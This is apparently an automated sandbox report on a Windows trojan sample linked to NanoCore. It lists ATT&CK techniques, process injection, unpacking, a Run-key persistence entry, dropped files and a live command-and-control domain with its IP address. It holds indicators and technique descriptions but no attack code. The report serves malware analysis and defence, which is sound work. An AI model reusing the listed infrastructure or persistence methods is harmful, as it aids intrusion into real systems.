    Source: Yara matchFile source: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.507263839.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rnixgfly.exe PID: 4904, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: rnixgfly.exe PID: 3192, type: MEMORYSTR
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Windows Management Instrumentation
    1
    Registry Run Keys / Startup Folder
    1
    Access Token Manipulation
    1
    Disable or Modify Tools
    11
    Input Capture
    1
    System Time Discovery
    Remote Services11
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default Accounts12
    Native API
    Boot or Logon Initialization Scripts112
    Process Injection
    11
    Deobfuscate/Decode Files or Information
    LSASS Memory2
    File and Directory Discovery
    Remote Desktop Protocol11
    Input Capture
    Exfiltration Over Bluetooth1
    Non-Standard Port
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts2
    Command and Scripting Interpreter
    Logon Script (Windows)1
    Registry Run Keys / Startup Folder
    2
    Obfuscated Files or Information
    Security Account Manager26
    System Information Discovery
    SMB/Windows Admin Shares1
    Clipboard Data
    Automated Exfiltration1
    Remote Access Software
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)31
    Software Packing
    NTDS4
    Security Software Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer1
    Non-Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Masquerading
    LSA Secrets2
    Process Discovery
    SSHKeyloggingData Transfer Size Limits21
    Application Layer Protocol
    Manipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common31
    Virtualization/Sandbox Evasion
    Cached Domain Credentials31
    Virtualization/Sandbox Evasion
    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
    Access Token Manipulation
    DCSync1
    Application Window Discovery
    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job112
    Process Injection
    Proc Filesystem1
    Remote System Discovery
    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
    Hidden Files and Directories
    /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 795634 Sample: fyTwP4SHWF.exe Startdate: 01/02/2023 Architecture: WINDOWS Score: 100 37 Snort IDS alert for network traffic 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Antivirus detection for URL or domain 2->41 43 7 other signatures 2->43 7 fyTwP4SHWF.exe 19 2->7         started        10 jfcarlsrvb.exe 2->10         started        12 jfcarlsrvb.exe 2->12         started        process3 file4 27 C:\Users\user\AppData\Local\...\rnixgfly.exe, PE32 7->27 dropped 14 rnixgfly.exe 1 2 7->14         started        18 WerFault.exe 4 10 10->18         started        20 WerFault.exe 10 12->20         started        process5 file6 31 C:\Users\user\AppData\...\jfcarlsrvb.exe, PE32 14->31 dropped 47 Detected unpacking (changes PE section rights) 14->47 49 Detected unpacking (overwrites its own PE header) 14->49 51 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 14->51 53 Maps a DLL or memory area into another process 14->53 22 rnixgfly.exe 9 14->22         started        signatures7 process8 dnsIp9 33 boele.duckdns.org 45.137.65.132, 49711, 49714, 49720 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Netherlands 22->33 35 192.168.2.1 unknown unknown 22->35 29 C:\Users\user\AppData\Roaming\...\run.dat, data 22->29 dropped 45 Hides that the sample has been downloaded from the Internet (zone.identifier) 22->45 file10 signatures11

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    fyTwP4SHWF.exe51%ReversingLabsWin32.Trojan.Nemesis
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\rnixgfly.exe10%ReversingLabsWin32.Trojan.InjectorX
    C:\Users\user\AppData\Roaming\ilkqegcy\jfcarlsrvb.exe10%ReversingLabsWin32.Trojan.InjectorX
    SourceDetectionScannerLabelLinkDownload
    2.2.rnixgfly.exe.4f60000.20.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
    1.2.rnixgfly.exe.ba0000.1.unpack100%AviraHEUR/AGEN.1230506Download File
    2.2.rnixgfly.exe.58c0000.24.unpack100%AviraTR/NanoCore.fadteDownload File
    2.2.rnixgfly.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
    0.2.fyTwP4SHWF.exe.291d7ec.1.unpack100%AviraHEUR/AGEN.1230498Download File
    No Antivirus matches
    SourceDetectionScannerLabelLink
    boele.duckdns.org100%Avira URL Cloudmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    boele.duckdns.org
    45.137.65.132
    truetrue
      unknown
      NameMaliciousAntivirus DetectionReputation
      boele.duckdns.orgtrue
      • Avira URL Cloud: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://nsis.sf.net/NSIS_ErrorErrorfyTwP4SHWF.exefalse
        high
        http://google.comrnixgfly.exe, 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.508870070.0000000006820000.00000004.08000000.00040000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.503941570.0000000003851000.00000004.00000800.00020000.00000000.sdmp, rnixgfly.exe, 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namernixgfly.exe, 00000002.00000002.502791120.0000000002551000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            45.137.65.132
            boele.duckdns.orgNetherlands
            204601ON-LINE-DATAServerlocation-NetherlandsDrontenNLtrue
            IP
            192.168.2.1
            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:795634
            Start date and time:2023-02-01 05:13:13 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 9m 18s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:19
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample file name:fyTwP4SHWF.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@9/17@20/2
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 86.6% (good quality ratio 82.8%)
            • Quality average: 82.2%
            • Quality standard deviation: 26.6%
            HCA Information:
            • Successful, ratio: 99%
            • Number of executed functions: 57
            • Number of non-executed functions: 70
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 20.189.173.21, 104.208.16.94
            • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
            • Not all processes where analyzed, report is missing behavior information
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtDeviceIoControlFile calls found.
            • VT rate limit hit for: fyTwP4SHWF.exe
            TimeTypeDescription
            05:14:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ryhcwrfexidnfv C:\Users\user\AppData\Roaming\ilkqegcy\jfcarlsrvb.exe "C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\
            05:14:16API Interceptor938x Sleep call for process: rnixgfly.exe modified
            05:14:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ryhcwrfexidnfv C:\Users\user\AppData\Roaming\ilkqegcy\jfcarlsrvb.exe "C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\
            05:14:31API Interceptor2x Sleep call for process: WerFault.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            45.137.65.132NlyJ7Xff6s.exeGet hashmaliciousBrowse
              SecuriteInfo.com.Exploit.CVE-2018-0798.4.13594.1348.rtfGet hashmaliciousBrowse
                CAOF8SGj9r.exeGet hashmaliciousBrowse
                  SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtfGet hashmaliciousBrowse
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    ON-LINE-DATAServerlocation-NetherlandsDrontenNLFactura63d40.msiGet hashmaliciousBrowse
                    • 80.89.239.12
                    Factura63d39.msiGet hashmaliciousBrowse
                    • 80.89.239.12
                    8FGsv4oTHU.exeGet hashmaliciousBrowse
                    • 77.83.173.136
                    http://luxurycompare.comGet hashmaliciousBrowse
                    • 91.228.56.183
                    jinx.arm7.elfGet hashmaliciousBrowse
                    • 185.241.54.201
                    NlyJ7Xff6s.exeGet hashmaliciousBrowse
                    • 45.137.65.132
                    SecuriteInfo.com.Exploit.CVE-2018-0798.4.13594.1348.rtfGet hashmaliciousBrowse
                    • 45.137.65.132
                    Zoom_setup.msiGet hashmaliciousBrowse
                    • 45.82.176.11
                    CAOF8SGj9r.exeGet hashmaliciousBrowse
                    • 45.137.65.132
                    8bUddwMVYB.exeGet hashmaliciousBrowse
                    • 185.219.80.143
                    SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtfGet hashmaliciousBrowse
                    • 45.137.65.132
                    UniverseCity.exeGet hashmaliciousBrowse
                    • 80.89.228.168
                    UniverseCity.exeGet hashmaliciousBrowse
                    • 80.89.228.168
                    Tx59QrgJCn.exeGet hashmaliciousBrowse
                    • 212.86.115.220
                    https://github.com/Roberhdjsjshhs/aternos/releases/download/video/nUcN4Rs3h2k9.exeGet hashmaliciousBrowse
                    • 45.147.197.24
                    http://www.fondationoiiq.org/nouvelles/la-fondation-remet-28-bourses-d-etudes-des-infirmieres-et-infirmiers-de-partout-au-quebec?c_rid=680h0mn9020oAFEEaAOY14204220%7C61500689&utm_campaign=773576&utm_medium=email&utm_source=fondation&utm_content=info&symid=264Get hashmaliciousBrowse
                    • 91.228.56.183
                    bgmmZtwaPm.exeGet hashmaliciousBrowse
                    • 212.86.115.220
                    j4KKtbax4Z.exeGet hashmaliciousBrowse
                    • 212.86.115.220
                    wZEuS96OuM.exeGet hashmaliciousBrowse
                    • 212.86.115.220
                    SecuriteInfo.com.Exploit.CVE-2018-0798.4.27891.11729.rtfGet hashmaliciousBrowse
                    • 212.86.115.220
                    No context
                    No context
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):65536
                    Entropy (8bit):0.9282124186735965
                    Encrypted:false
                    SSDEEP:96:voIuFSZJXdwhja72TNFpXIQcQ4c6K/cEIcw3RGxD+HbHg/LAeugtYsaGFYAKcEoi:ANuZKHWoyF7joqAt/u7sIS274Ith
                    MD5:DDF46C9A2DDD07C0336B3027C3EA945A
                    SHA1:AEDDE88C7A40C1949C6FEFAF9BB5E7B4CA2EEFFB
                    SHA-256:A099199692B0F30C4A6D330C46C9008E331B1AC06D2A462A7799E4937F487408
                    SHA-512:7582EBA198370AF8094B62DCE81FE03B20010A17F11D06A291ED2D749D495462C43B9A9F027AEB9A88D265100A62AE86745740CA91AFD7A788616EF8D6D4A23D
                    Malicious:false
                    Reputation:low
                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.7.3.0.8.6.7.5.0.2.7.7.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.9.7.3.0.8.6.8.4.5.5.8.9.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.3.f.9.2.d.a.3.-.b.5.b.5.-.4.c.d.8.-.a.6.7.d.-.1.9.9.6.4.e.e.f.4.b.c.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.1.c.4.0.7.3.0.-.0.7.e.b.-.4.9.7.5.-.9.6.0.c.-.8.9.5.0.d.3.2.f.5.d.d.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.j.f.c.a.r.l.s.r.v.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.b.0.-.0.0.0.1.-.0.0.1.a.-.7.2.e.a.-.c.4.1.8.3.f.3.6.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.f.7.7.7.8.6.6.2.5.d.3.b.5.3.a.d.8.2.2.b.5.3.0.5.4.3.a.d.6.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.7.8.a.d.b.b.8.a.1.e.f.c.b.4.f.0.a.b.5.b.e.b.a.8.a.3.c.f.7.0.e.5.0.7.4.b.e.9.4.5.!.j.f.c.a.r.l.s.r.v.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):65536
                    Entropy (8bit):0.9211945957633184
                    Encrypted:false
                    SSDEEP:96:nMF+JX9whja72TNFpXIQcQ4c6K/cEIcw3RGxD+HbHgA5aeugtYsaoDtsEa2bm6oU:MgZqHWoyF7jEhy8/u7sIS274Ith
                    MD5:B1B32A4B231CEA5577B2396F64E8DED7
                    SHA1:D4FF3D70716DAF5B81E34199EE3D8697379AB5EF
                    SHA-256:FC8D6BC42D8EDB5246BFB340ABD975F0AD3328D22D5283B8108A09CCCF91E8C9
                    SHA-512:1DDCC810636F2EDF6984C08AE2AA96A3F017CD0C70A15B829279FE1A5985BCAD43CBB4C47E3EC08AD46C70F02C450CFC1E7987894A1A76241B24595D09C629AF
                    Malicious:false
                    Reputation:low
                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.7.3.0.8.7.2.0.4.3.7.9.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.9.7.3.0.8.7.3.4.5.0.3.1.7.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.4.9.2.b.d.5.-.1.2.3.2.-.4.0.a.0.-.a.9.5.3.-.e.e.c.2.c.4.c.f.3.f.1.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.7.b.7.b.b.a.-.8.7.3.c.-.4.8.b.d.-.8.d.4.b.-.7.7.a.f.4.2.6.8.b.d.6.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.j.f.c.a.r.l.s.r.v.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.f.8.-.0.0.0.1.-.0.0.1.a.-.1.4.6.3.-.3.f.1.e.3.f.3.6.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.f.7.7.7.8.6.6.2.5.d.3.b.5.3.a.d.8.2.2.b.5.3.0.5.4.3.a.d.6.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.7.8.a.d.b.b.8.a.1.e.f.c.b.4.f.0.a.b.5.b.e.b.a.8.a.3.c.f.7.0.e.5.0.7.4.b.e.9.4.5.!.j.f.c.a.r.l.s.r.v.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:Mini DuMP crash report, 14 streams, Wed Feb 1 13:14:32 2023, 0x1205a4 type
                    Category:dropped
                    Size (bytes):38214
                    Entropy (8bit):2.1593548134413028
                    Encrypted:false
                    SSDEEP:192:p6wEptF2xdgXDOG4RCqujP/S0xp2yEDruvXVqDNn:UWuX6GsgS8XvXm
                    MD5:80F8852BF24981FB18C0A96C052A2B7F
                    SHA1:16D60E79EA4971593403FD2EE5F607EE6BE87A34
                    SHA-256:DE8579536E029CC7652EDAD3AACF068A191165F3E6A1F6AB4E6D76FE9E448F8C
                    SHA-512:CC17FC6E4399C114EDE115243F9C8BF49997E29CF87D7BF6D36A2D06FB7E9BCDC8E043849BAD2303474B64AC6B7FDD69D70E991FDB19743B18F8030841D29589
                    Malicious:false
                    Reputation:low
                    Preview:MDMP....... ........e.c........................(...............^,..........T.......8...........T...............6|...........................................................................................U...........B......H.......GenuineIntelW...........T............e.c............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):8350
                    Entropy (8bit):3.690202005811949
                    Encrypted:false
                    SSDEEP:192:Rrl7r3GLNi5+6I9h6YApSUSAgmf0SQCpr789bE/sfVsm:RrlsNiw66h6YuSUSAgmf0SkEkfL
                    MD5:88780EF5D141127E1DFEF0794FC4D422
                    SHA1:25C0D6C64EA99F73330E819125FE96D2F0CA049C
                    SHA-256:D043A2505305FFAFC024623E94C00ADFDDC9379F383544450A07BD92D3268884
                    SHA-512:DE207DBA4CC31E054D5F7963F3FAD6024458D3F016594AB87EDC65A42AA97BA09E4F8BFC7AA91D2E83EC53B592A32917C5260CB22D5AE56C733034AC05E8D544
                    Malicious:false
                    Reputation:low
                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.8.0.<./.P.i.d.>.......
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):4664
                    Entropy (8bit):4.424392328941231
                    Encrypted:false
                    SSDEEP:48:cvIwSD8zsRJgtWI97TWgc8sqYjy68fm8M4JczIFA+q8vczhusvypV+d:uITfj8igrsqYuPJ6xK6hus6P+d
                    MD5:AF14FA1090319F74BF2092FCFD6F5C79
                    SHA1:1B87280B0A5F4D634A8B691FE3EC21856168AEDA
                    SHA-256:791A72355185A77E4F49F6E60C0FF995E65244D7246C9037E5AED5C9B23F71F5
                    SHA-512:BFF3B31ED93183211A0B999FA65B9A773E1CBFD29B110103FB2C73E185C7BC6C58D07A10C184EE36378803259F386329BA960B232DF5B88C9C95327B2120A2CB
                    Malicious:false
                    Reputation:low
                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1893505" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:Mini DuMP crash report, 14 streams, Wed Feb 1 13:14:27 2023, 0x1205a4 type
                    Category:dropped
                    Size (bytes):38630
                    Entropy (8bit):2.1542418285429483
                    Encrypted:false
                    SSDEEP:192:uaVJF1NTbMK4SvwOX4UElZAxEsbybEg20xpGPDD0gfTw6DqnHYD:VPMKfXJEgyse2xRfTw6YY
                    MD5:CA6B0C408F1446644DB673F890264054
                    SHA1:106089C73F0B60231EAC2C863703834C5D1F243C
                    SHA-256:DE57C4FFE0354AA56F93146AD380A89195BEF29447F1F01A4D37A27076E21C4D
                    SHA-512:2DCFDE5A0938C2D76E582A28FD43AC463145D6447A7BCDAFAF0442F676AADB811DD4B26267A56A78A9FFE559EEB54EAE77943BE33D948F017BC193F9F2DD3BB8
                    Malicious:false
                    Reputation:low
                    Preview:MDMP....... ........e.c.........................................,..........T.......8...........T...........(....|..........0................................................................................U...........B..............GenuineIntelW...........T............e.c............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):8356
                    Entropy (8bit):3.691371045380274
                    Encrypted:false
                    SSDEEP:192:Rrl7r3GLNi/f6oe6YATSU2kNgmf0SQCprh89bvOsfylm:RrlsNiX6h6YkSU2Egmf0SWvNf5
                    MD5:BFA45D9D415A6E65115D148151951505
                    SHA1:9D203365D8B26D118F7F9FAA04A32309D25915A8
                    SHA-256:E0276D450652BEC9F95144EBF39D7E2BC613BCC12443F5510E14548B7B228E6A
                    SHA-512:5B70D83C5A91C0DF4FEA3FD8BB4322D56BB692257DF4C13DC14C435841085F0C037A9AC1D98B624497A98FC83999F3E9AA20BFF86C15EB4F41E92FEF3F7145BE
                    Malicious:false
                    Reputation:low
                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.5.2.8.<./.P.i.d.>.......
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):4664
                    Entropy (8bit):4.424419638363648
                    Encrypted:false
                    SSDEEP:48:cvIwSD8zsRJgtWI97TWgc8sqYju8fm8M4JczIFjg+q8vczD+usvypVDd:uITfj8igrsqY/J6xK6Cus6PDd
                    MD5:39F1047F409235BC85CCC6B8A5FD5470
                    SHA1:9873EA4CCA3B6151E1492A3F4C6299D5610E9FC6
                    SHA-256:B4FBD8A971C0251505D10F2DFD639DC9ED36E044904B7B632169E5CFDD41C723
                    SHA-512:4367384E07D518E5C89F8FEA3BD67E4A9B8182B5427461DD19876F068BFCFFFF11B0C8D88FD6A4BB407580790AAB6D0125E3DBA8D0BE35F3D609C1D5C1213745
                    Malicious:false
                    Reputation:low
                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1893505" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                    Process:C:\Users\user\Desktop\fyTwP4SHWF.exe
                    File Type:data
                    Category:dropped
